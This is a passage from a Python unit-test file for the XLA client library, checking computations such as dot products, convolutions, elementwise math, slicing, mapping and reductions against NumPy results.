rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().Execute()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().Execute()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
